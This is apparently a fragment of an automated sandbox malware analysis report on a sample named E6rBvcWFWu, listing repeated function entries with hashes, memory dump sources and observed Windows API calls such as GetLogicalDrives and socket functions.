                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: a4eb0508af9d0704d275c9e8895779e98fb49ea8e3fd83a78198c1750d5d0749
                                    • Instruction ID: 0a268c86c7b188696a471c6bea088c1a01a2e7d059d27f9f7e145ba863a80479
                                    • Opcode Fuzzy Hash: a4eb0508af9d0704d275c9e8895779e98fb49ea8e3fd83a78198c1750d5d0749
                                    • Instruction Fuzzy Hash: 34A16EEB26C131BD714281452B14AFB6BAEE5C7730BB1C82BF807D6516E2984E6F7035

                                    Control-flow Graph
                                    • Graph of function starting at 7420000; API calls on the graph: GetLogicalDrives
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 2615d13aa38052a10c7fdb61df0cce6f3fd79bb102ed4bffefe75b32dbc01aad
                                    • Instruction ID: 6834e0d4703acb3ac5cfa26eab59d84566db6a9fcd5f1570206f9ea6b7e35f3d
                                    • Opcode Fuzzy Hash: 2615d13aa38052a10c7fdb61df0cce6f3fd79bb102ed4bffefe75b32dbc01aad
                                    • Instruction Fuzzy Hash: C4A15CEB26C131BD7142C1452B14AFB6AAEE5C7730BB1C82BF807D6512E2984E6B7035

                                    Control-flow Graph
                                    • Graph of function starting at 7420046; API calls on the graph: GetLogicalDrives
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 4e91b62e4f7f4e352a7a2f20154e6029268447369ecaa2fdd667da5469e1c78d
                                    • Instruction ID: b08539da7cce56813a2548495bb3dc3393bce0e79947de1a15aeb262e85889d0
                                    • Opcode Fuzzy Hash: 4e91b62e4f7f4e352a7a2f20154e6029268447369ecaa2fdd667da5469e1c78d
                                    • Instruction Fuzzy Hash: 87A15DEB26D131BD714281452B14AFB6BAEE5C7730BB1C82BF807D6512E2984E6F7035

                                    Control-flow Graph
                                    • Graph of function starting at 7420037; API calls on the graph: GetLogicalDrives
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 077e992ab282ec1c1b93f6cbc566a91f46d03eac0286dd9b4b8db9fe7e0e0bbd
                                    • Instruction ID: 052c408d51f77e08bf5d4c0d609fd57d0e27d4327e3c5c7057a7b97457d0ca27
                                    • Opcode Fuzzy Hash: 077e992ab282ec1c1b93f6cbc566a91f46d03eac0286dd9b4b8db9fe7e0e0bbd
                                    • Instruction Fuzzy Hash: 7D914DEB26D131BD714281452B14AFB6BAEE5C7730BB1C827F807D6512E2984E6F7035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: e5b9f0d0f0efca4d8620659425e6f5c0f10049f5583eccf0b695746a98e8d26b
                                    • Instruction ID: a21ae641236edb0f7aa8591d0b3a5c9e48817fcbf971b9d2835e30e99a383f46
                                    • Opcode Fuzzy Hash: e5b9f0d0f0efca4d8620659425e6f5c0f10049f5583eccf0b695746a98e8d26b
                                    • Instruction Fuzzy Hash: F4914DEB26C131BD7142C1852B14AFB5BAEE5C7730BB1C82BF807D6516E2944E6B6035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 47b17e223a4e2c0790ab30f31099e8338fb92ce90f134905df50109fb999aed5
                                    • Instruction ID: 6345cdb0e019539274e1094ce5c943827d88673d7851840ff56a498faa2477e1
                                    • Opcode Fuzzy Hash: 47b17e223a4e2c0790ab30f31099e8338fb92ce90f134905df50109fb999aed5
                                    • Instruction Fuzzy Hash: 36915BEB26C131BD7142C1852B14AFB6BAEE5C7730BB1C82BF807D5512E2984E6B7035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 4bd809dcf7bee4fd43e2026b72b6c925f36e903860238ee053b7f3ae072b49f9
                                    • Instruction ID: e352b1ac7f98cf0b4c280dfa4ae7ea5fa19f6dacbdcc08a8d06a1e3f88e05b08
                                    • Opcode Fuzzy Hash: 4bd809dcf7bee4fd43e2026b72b6c925f36e903860238ee053b7f3ae072b49f9
                                    • Instruction Fuzzy Hash: D1915DEB26D131BD7142C1452B14AFB66AEE4C7730BB1C82BF807D5516E2944E6F7035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: c967abdf24a13f31996ce01d602e1f6d3ce0df8d201bdc0f5d05f455c480b4e5
                                    • Instruction ID: 8d99e126fbb7a9fb94d6ed77f8f395ccff8283f287d4ee22e5cefb35ee8aec83
                                    • Opcode Fuzzy Hash: c967abdf24a13f31996ce01d602e1f6d3ce0df8d201bdc0f5d05f455c480b4e5
                                    • Instruction Fuzzy Hash: 04915BEB26C131BD7142C1852B54AFB6BAEE5C7730BB1C82BF807D5522E2944E6B7035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 1755bcb770fd2e96256283b73fb00d9d34cc5b0b278c108e73c6179b18a92cd8
                                    • Instruction ID: d56492590967824bf84b441719d562724026443225fde647427453cd1dccd977
                                    • Opcode Fuzzy Hash: 1755bcb770fd2e96256283b73fb00d9d34cc5b0b278c108e73c6179b18a92cd8
                                    • Instruction Fuzzy Hash: E0815BEB26C131BD7142C1852B14AFB6AAEE5C7730BB1C82BF807D5512E2984E6B7035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 1b3dc3e95520dcaa3ccd0be69264c1fe786afd17360abf284df24931820ef7e2
                                    • Instruction ID: 4e47f40ece1dda3a7442d4a0c1df6e5402674d743d8c514c374008923a03ee31
                                    • Opcode Fuzzy Hash: 1b3dc3e95520dcaa3ccd0be69264c1fe786afd17360abf284df24931820ef7e2
                                    • Instruction Fuzzy Hash: AA817EEB26C131BD7142C5852B14AFB6AAEE4C7730BB1C82BF807D6512E2944E6F7135
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 5eecdec4ed38883215926d8620123ef13c36ef376931d0f3e3115a1592695584
                                    • Instruction ID: 065e1d26aecc4cd398f12d71d16339372b649bdc334622adcbbb49ccd626c20b
                                    • Opcode Fuzzy Hash: 5eecdec4ed38883215926d8620123ef13c36ef376931d0f3e3115a1592695584
                                    • Instruction Fuzzy Hash: B0816CEB26C131BD7142C5852B54AFB6BAEE4C7730BB1C82BF807D6512E2944E6B7035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: 4847693c250f77fbf234bcfa3b903d8acc16fe6091752837328fef2e328de9e5
                                    • Instruction ID: e424af4b0cb5a007eec615e900e536e1af74526e7e1f07d1aae024d7021182fa
                                    • Opcode Fuzzy Hash: 4847693c250f77fbf234bcfa3b903d8acc16fe6091752837328fef2e328de9e5
                                    • Instruction Fuzzy Hash: 59817DEB26C131BD7142C1852B14AFB6BAEE5C7730BB1C827F807D6512E2984E6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 67cd36ebf4b6c8e49ae434f4467b357881d002cec4a489006678c8ab745c4576
                                    • Instruction ID: 972f8e84b94269d71de6e24a384b92231387164042848728c119e1157a0fbc01
                                    • Opcode Fuzzy Hash: 67cd36ebf4b6c8e49ae434f4467b357881d002cec4a489006678c8ab745c4576
                                    • Instruction Fuzzy Hash: 9B813CEB26D131BD7142C1852B14AFBABAEE5C7730BB1C827F807D5512E2984E6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 0e80a2017dd688599355957e23ebbda02df0dbbbcc238c4aec95462af599a610
                                    • Instruction ID: fe51506fc7b3c1220541b7fac7aa3fa7b1f44936538d1ebd326a55f6298001ca
                                    • Opcode Fuzzy Hash: 0e80a2017dd688599355957e23ebbda02df0dbbbcc238c4aec95462af599a610
                                    • Instruction Fuzzy Hash: 55715CEB26C131BD7142C1852B14AFB6BAEE5C7730BB1C827F807D5522E2984E6B7035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\$A:\
                                    • API String ID: 0-1047444362
                                    • Opcode ID: ea20bc391a765fc804569a8154ceeee7a59f643caa56501820a1bec35959ce76
                                    • Instruction ID: acb735eecac1ad2c9e4a5b5ec38101f55a86e84ab1b395186e511bdb147c6f0c
                                    • Opcode Fuzzy Hash: ea20bc391a765fc804569a8154ceeee7a59f643caa56501820a1bec35959ce76
                                    • Instruction Fuzzy Hash: 6C7181EB26D131BD7202C1912B14AFB6BAEE4C77307B1C827F807D5512E2984E6B6135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 8e1d568b63b6ff2ce566c703fbbed52bc3248382894c932d9b2b76e052183b28
                                    • Instruction ID: 2208d2c4f0bc0172cc70fab6ae361e4dcfa76df7968c668e471467a3195b5de6
                                    • Opcode Fuzzy Hash: 8e1d568b63b6ff2ce566c703fbbed52bc3248382894c932d9b2b76e052183b28
                                    • Instruction Fuzzy Hash: A7615EEB26C131BE7142C5816B14AFB67AEE5C7730BB1C827F807D5522E2984E6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: b64139762c3b7ed796bcd6ac267c0a949f2060935baa56485bcc4ddcb33493be
                                    • Instruction ID: 2b6d7f680f0c18f17c4f9004d5ddc7d9a712fadbe1727f6112923044c9037a1d
                                    • Opcode Fuzzy Hash: b64139762c3b7ed796bcd6ac267c0a949f2060935baa56485bcc4ddcb33493be
                                    • Instruction Fuzzy Hash: 4D615FEB26D131BE7142C1816B14AFB66AEE5C7730BB1C827F807D5522E2984F6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: ca94a578283050b4e558a96cfa2e093fad1496001ae51e5ca3ff28ad02a1c871
                                    • Instruction ID: 51c10df0c32f404c78909a15d2876907afb16b7b77676f1bdc87f68d227f2fb6
                                    • Opcode Fuzzy Hash: ca94a578283050b4e558a96cfa2e093fad1496001ae51e5ca3ff28ad02a1c871
                                    • Instruction Fuzzy Hash: EC6180EB26C131BE7252C1812B14AFB5BAEE5C7730BB1C827F407D5522E2980E6B7135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: e380a5f7162a1842c559f7373ef5823e59ba493953826fe93e24319b8a167717
                                    • Instruction ID: c0961633a9dde9053965bc149afbb8c1f61ef8e6157d116886c03bb5b8f1a72c
                                    • Opcode Fuzzy Hash: e380a5f7162a1842c559f7373ef5823e59ba493953826fe93e24319b8a167717
                                    • Instruction Fuzzy Hash: A26171EB26C131BE7142C1816B14AFB5BAEE5C7730BB1C827F807D5511E2984E6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 434ab14da896b259f2c6077adf516cf8113bd785af3ca670f37221c034a5d5d1
                                    • Instruction ID: 77fb9a241312c5659d1e5a0aec2c376dc98c8076d772010e5f7862b17c8f6b86
                                    • Opcode Fuzzy Hash: 434ab14da896b259f2c6077adf516cf8113bd785af3ca670f37221c034a5d5d1
                                    • Instruction Fuzzy Hash: 0B516DEB26D131BE7142C1812B14AFB6BAEE5C7730BB1C827F407D5522E2980E6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 576f516488e22d4c5fe4844e99a01d2ccb35d57f75cd4afe7033826b78ed396f
                                    • Instruction ID: dca0b8c96c61a1f438adfd43af92f3d4483aa2eecedb746bc1a187b7dfd50c32
                                    • Opcode Fuzzy Hash: 576f516488e22d4c5fe4844e99a01d2ccb35d57f75cd4afe7033826b78ed396f
                                    • Instruction Fuzzy Hash: B8517EEB26C131BE7142C1812B14AFB6BAEE5C7730BB1C827F807D5512E2980E6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: c0b14e299e3843abc519a916de8f80480ffe5acf904b1f6e14b2f89cf8827010
                                    • Instruction ID: 568416b87b35859efc3367120165024d3635210c9c7b0a5570fee1eded8f5c05
                                    • Opcode Fuzzy Hash: c0b14e299e3843abc519a916de8f80480ffe5acf904b1f6e14b2f89cf8827010
                                    • Instruction Fuzzy Hash: 4751A2EB26C131BE7202C1956B14AFB6BADE5C7730BB1C82BF407D5511D2940E6B7135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 1d185e808247654b11cef077a43fbca4e6799f912e6d152c29d875db524f0d90
                                    • Instruction ID: 6755c78741a5733eb8ebd355645d6e1b8abc208b82dfac7346fb93d6db455938
                                    • Opcode Fuzzy Hash: 1d185e808247654b11cef077a43fbca4e6799f912e6d152c29d875db524f0d90
                                    • Instruction Fuzzy Hash: 3C5193EB26D131BE7212C1952B14AFB5AEEE5C7730BB1C827F407D6521D2980EAB7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\
                                    • API String ID: 999431828-1047444362
                                    • Opcode ID: 508d462e00ff2ada018a669428fd45dd03afa082dc99efa1a27295b6c0b05340
                                    • Instruction ID: 77ac3933f38369788fa963399f9a5ed8840e3c4ec2f7d92915328e6811cf88ba
                                    • Opcode Fuzzy Hash: 508d462e00ff2ada018a669428fd45dd03afa082dc99efa1a27295b6c0b05340
                                    • Instruction Fuzzy Hash: 4D5192EB26C131BE7102C5912B14AFB57AEE5C7730BB1C827F407C5511D2980EAB7035
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 006AA1C7
                                    Strings
                                    • getsockname() failed with errno %d: %s, xrefs: 006AA1F0
                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 006AA23B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                    • API String ID: 3358416759-2605427207
                                    • Opcode ID: 6126be17b7b4392bc98b9746a041390843c1589d8f178012242bbc25de97b550
                                    • Instruction ID: 67dc59669072fdaa9bad3fa996174490c14111ac3c0be6d2e52ccf4e352f33f9
                                    • Opcode Fuzzy Hash: 6126be17b7b4392bc98b9746a041390843c1589d8f178012242bbc25de97b550
                                    • Instruction Fuzzy Hash: A321FB31808680BAE721AB58DC42FE773BCEF92328F040615F99853151FB325D858BE3
                                    APIs
                                    • WSAStartup.WS2_32(00000202), ref: 0068D65A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: Startup
                                    • String ID: if_nametoindex$iphlpapi.dll
                                    • API String ID: 724789610-3097795196
                                    • Opcode ID: 6166fc998eb24841055009b983978bb27f929ddbd1109e7bd9112bda49dc0501
                                    • Instruction ID: 7ec00b72bf552cb62c88f49c8ae00efebc4f2edb856e0ea11204ebb363748602
                                    • Opcode Fuzzy Hash: 6166fc998eb24841055009b983978bb27f929ddbd1109e7bd9112bda49dc0501
                                    • Instruction Fuzzy Hash: 8401269098038156EB217B38AC1B7A636A56B52344F89166DEC48D23D2F76AC8D9C373
                                    APIs
                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0073AB9B
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0073ABE4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: ioctlsocketsocket
                                    • String ID:
                                    • API String ID: 416004797-0
                                    • Opcode ID: cdab9efcea31eb4a4175baeb65aeae4ef10be3e901db755209a193ef651ed8ac
                                    • Instruction ID: dcaf1061ae0b1c1b78871d9a9405d605789b4c9c4571256147ab7b6d1a5384b2
                                    • Opcode Fuzzy Hash: cdab9efcea31eb4a4175baeb65aeae4ef10be3e901db755209a193ef651ed8ac
                                    • Instruction Fuzzy Hash: 52E1B170604302ABEB20CF14C886B6BB7E5EF85314F145A2CF9998B292D779D944CB92
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
